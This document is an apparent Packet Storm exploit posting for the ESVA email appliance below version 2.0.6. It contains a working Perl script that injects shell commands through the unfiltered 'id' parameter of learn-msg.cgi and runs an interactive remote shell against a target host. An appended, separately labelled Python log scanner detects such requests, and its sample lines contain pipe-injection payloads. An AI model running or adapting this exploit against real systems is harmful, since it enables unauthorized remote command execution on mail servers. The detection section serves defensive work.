E-Mail Security Virtual Appliance (ESVA) Remote Command Execution

2012-08-17T00:00:00
ID PACKETSTORM:115625
Type packetstorm
Reporter iJoo
Modified 2012-08-17T00:00:00

Description

                                        
`# Exploit Title: E-Mail Security Virtual Appliance (ESVA) Remote Execution.  
# Date: 10 Aug 2012  
# Exploit Author: iJoo  
# Vendor Homepage: http://www.esvacommunity.com/  
# Software Link: http://sourceforge.net/projects/esva-project/  
# Version: < 2.0.6  
  
ESVA (E-Mail Security Virtual Appliance) is a pre-built and semi-configured email scanning appliance that will run on VMware Workstation, Server, Player or ESX Server.  
  
-=+ Affected Files  
  
..../cgi-bin/learn-msg.cgi  
..../cgi-bin/release-msg.cgi  
  
Neither script strips or filters shell metacharacters,  
so an attacker can easily execute commands.  
  
-=+ Simple RCE ESVA  
  
#! /usr/bin/perl  
use LWP;  
use HTTP::Request;  
if (@ARGV < 1)  
{  
print "\n==========================================\n";  
print " ESVA - REMOTE EXECUTION SCRIPT \n";  
print "==========================================\n";  
print "Usage: perl esva.pl host (without http://)\n";  
print "Ex. perl esva.pl www.korban.com\n";  
exit;  
}  
$host=$ARGV[0];  
print "Try to Execution Command!\n";  
print "iDSc-shell# ";  
chomp( $cmd = <STDIN>);  
while($cmd !~ "exit")  
{  
$content = "";  
$ua = LWP::UserAgent->new();  
$ua->agent('');  
$request = HTTP::Request->new (GET => "http://".$host."/cgi-bin/learn-msg.cgi?id=%7c".$cmd."%3b");  
$response = $ua->request ($request);  
$content = $response->content;  
print $content."\n";  
print "iDSc-shell# ";  
chomp( $cmd = <STDIN>);  
}  
  
-=+ Thanks to  
My lovely Country NKRI INDONESIA!!  
binh4x staff - www.binushacker.net // Forum.binushacker.net  
  
`
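
Added example, not part of the original advisory: a Python check over web-server access logs that flags requests to the two CGI scripts named above whose parameters, once URL-decoded, contain anything outside a conservative allowlist. The Apache combined log format, the allowlist of characters and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, unquote_plus

# CGI scripts named in the advisory; the path prefix is site-specific.
AFFECTED = ("learn-msg.cgi", "release-msg.cgi")
# Assumption: legitimate parameter values use only these characters.
SAFE_VALUE = re.compile(r"[A-Za-z0-9._-]+")
# Request line of a combined-format access log entry.
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')

def suspicious_params(target):
    """Return [(name, decoded value)] that fail the allowlist, else []."""
    path, _, query = target.partition("?")
    if not unquote(path).endswith(AFFECTED):
        return []
    hits = []
    for pair in filter(None, query.split("&")):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        # Allowlist check: pipes, semicolons, leftover '%' and blanks all fail.
        if not SAFE_VALUE.fullmatch(value):
            hits.append((unquote_plus(name), value))
    return hits

def scan(lines):
    """Return [(client, request target, failing parameters)] per flagged line."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            findings.append((line.split()[0], match.group(1), hits))
    return findings

# Constructed sample log lines (documentation addresses, invented message id).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Aug/2012:10:01:02 +0000] "GET /cgi-bin/learn-msg.cgi?id=4F2A1B3C9D.A1B2C HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [17/Aug/2012:10:05:44 +0000] "GET /cgi-bin/learn-msg.cgi?id=%7cid%3b HTTP/1.1" 200 87 "-" "-"',
    '198.51.100.7 - - [17/Aug/2012:10:06:01 +0000] "GET /cgi-bin/release-msg.cgi?id=%257cid HTTP/1.1" 200 0 "-" "-"',
    '192.0.2.10 - - [17/Aug/2012:10:07:30 +0000] "GET /index.html?q=a%7cb HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, target, hits in scan(SAMPLE_LOG):
        print(client, target, hits)
```

Because the check is an allowlist, the double-encoded value in the third sample line is flagged as well: one round of decoding leaves a `%` that is not a permitted character.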